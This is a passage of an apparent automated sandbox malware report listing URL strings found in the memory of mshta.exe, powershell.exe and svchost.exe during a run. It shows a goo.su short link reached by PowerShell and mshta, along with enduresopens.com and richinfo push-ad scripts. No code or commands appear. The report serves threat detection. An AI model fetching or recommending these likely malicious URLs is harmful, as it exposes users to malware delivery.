Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33DA
Source: mshta.exe, 00000008.00000002.2538565091.0000014F38CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489C:
Source: mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489Internet
Source: mshta.exe, 00000008.00000003.1405409731.0000014F36C5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489Sl8
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489eflate
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489n.
Source: mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489oto:400&display=swapap
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489p
Source: mshta.exe, 00000008.00000003.1406447403.0000014734139000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open%20Sans:400&display=swap
Source: mshta.exe, 00000008.00000003.1362474328.0000014F36BFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400&display=swap
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400&display=swap(
Source: mshta.exe, 00000008.00000003.1362305846.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362474328.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400&display=swaph&
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/:
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/l/font?kit=KFOmCnqEu92Fr1Mu4mxO&skey=a0a0114a1dcab3ac&v=v32
Source: mshta.exe, 00000008.00000003.1362305846.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362474328.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36BDB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1369112341.0000014F36BF7000.00000004.00000020.00020000.00000000.sdmp, css[1].css.8.drString found in binary or memory: https://fonts.gstatic.com/l/font?kit=KFOmCnqEu92Fr1Mu4mxO&skey=a0a0114a1dcab3ac&v=v32);
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/l/font?kit=KFOmCnqEu92Fr1Mu4mxO&skey=a0a0114a1dcab3ac&v=v326
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/l/font?kit=KFOmCnqEu92Fr1Mu4mxO&skey=a0a0114a1dcab3ac&v=v32C:
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/l/font?kit=KFOmCnqEu92Fr1Mu4mxO&skey=a0a0114a1dcab3ac&v=v32e=33r
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/l/font?kit=KFOmCnqEu92Fr1Mu4mxO&skey=a0a0114a1dcab3ac&v=v32js~
Source: mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362474328.0000014F36BF5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36BDA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmp, css[2].css.8.drString found in binary or memory: https://fonts.gstatic.com/l/font?kit=memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVY&ske
Source: qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000B.00000003.1371346864.000002576A1F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: mshta.exe, 00000008.00000003.1404399990.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539503014.0000014F3AA92000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539155100.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/googlefonts/opensans)
Source: mshta.exe, 00000008.00000002.2539543137.0000014F3AFA7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1390051694.0000014F36AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/googlefonts/opensans)Thread-00001d7c-Id-00000000
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404399990.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/
Source: mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/&
Source: mshta.exe, 00000008.00000003.1404399990.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/6B
Source: powershell.exe, 00000007.00000002.1309161789.00000289009EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1309161789.0000028900A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J
Source: mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi
Source: powershell.exeString found in binary or memory: https://goo.su/J3JHqIi$global:?
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi%J
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi&
Source: mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi)
Source: mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi-
Source: mshta.exe, 00000008.00000003.1406447403.0000014734139000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi...
Source: mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi...p.r
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi.dllz
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi/code.js4
Source: mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi::
Source: powershell.exe, 00000007.00000002.1310805520.000002891870E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiA
Source: powershell.exe, 00000007.00000002.1310805520.000002891870E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiA%
Source: powershell.exe, 00000007.00000002.1310805520.000002891870E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiAF
Source: mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734050000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiC:
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiE
Source: mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiF
Source: mshta.exe, 00000008.00000002.2535291275.0000014734010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiH
Source: mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiR
Source: powershell.exe, 00000007.00000002.1312592557.000002897FCE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiRRYg
Source: mshta.exe, 00000008.00000002.2535430577.0000014734058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiSk
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiU
Source: mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiZ
Source: mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIi_
Source: mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIia
Source: mshta.exe, 00000008.00000002.2535920736.0000014734300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIic=C:
Source: mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIierMutex
Source: mshta.exe, 00000008.00000002.2539215239.0000014F38EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIihttps://enduresopens.com/ttkXIvunodY/69489
Source: mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIii
Source: powershell.exe, 00000007.00000002.1311703716.000002897E173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIil
Source: powershell.exe, 00000007.00000002.1309161789.0000028900541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIip
Source: mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIirogra
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIit
Source: mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/J3JHqIiy
Source: powershell.exe, 00000007.00000002.1309161789.00000289009EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goo.su/JX
Source: mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362474328.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404399990.0000014F38E9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2536346669.0000014F35E50000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5
Source: mshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb50f
Source: mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5105
Source: mshta.exe, 00000008.00000003.1362305846.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362474328.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5C:
Source: mshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5STEM32s
Source: mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5XXC:
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5Zf
Source: mshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5s
Source: mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.su/uu
Source: mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: qmgr.db.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: mshta.exe, 00000008.00000003.1405909985.0000014F36ACB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538565091.0000014F38CE5000.00000004.00000020.00020000.00000000.sdmp, code[1].js.8.drString found in binary or memory: https://privacy-cs.mail.ru/static/sync-loader.js
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/b
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/f
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36B60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1369112341.0000014F36BF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33
Source: mshta.exe, 00000008.00000003.1369112341.0000014F36BF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33/6
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33EcxU
Source: mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33F
Source: mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33I
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33N
Source: mshta.exe, 00000008.00000003.1369140620.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33XXC:
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33age
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://richinfo.co/z
Source: mshta.exe, 00000008.00000002.2538565091.0000014F38CE5000.00000004.00000020.00020000.00000000.sdmp, code[1].js.8.drString found in binary or memory: https://top-fwz1.mail.ru
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/Z
Source: mshta.exe, 00000008.00000003.1369140620.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36BD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36BFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362305846.0000014F36BFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1369140620.0000014F36BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1369112341.0000014F36BF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362474328.0000014F36BFD000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drString found in binary or memory: https://top-fwz1.mail.ru/counter?id=3128781;js=na
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drString found in binary or memory: https://top-fwz1.mail.ru/js/code.js
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.js(
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsC:
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsI
Source: mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsh
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsjs
Source: mshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsjs?id=399eaf833ac5f607b305c4ace0c25eb5/=
Source: mshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsjsid=399eaf833ac5f607b305c4ace0c25eb5105
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsp
Source: mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jstS
Source: mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsuD2qF6
Source: mshta.exe, 00000008.00000002.2538729752.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://top-fwz1.mail.ru/js/code.jsw
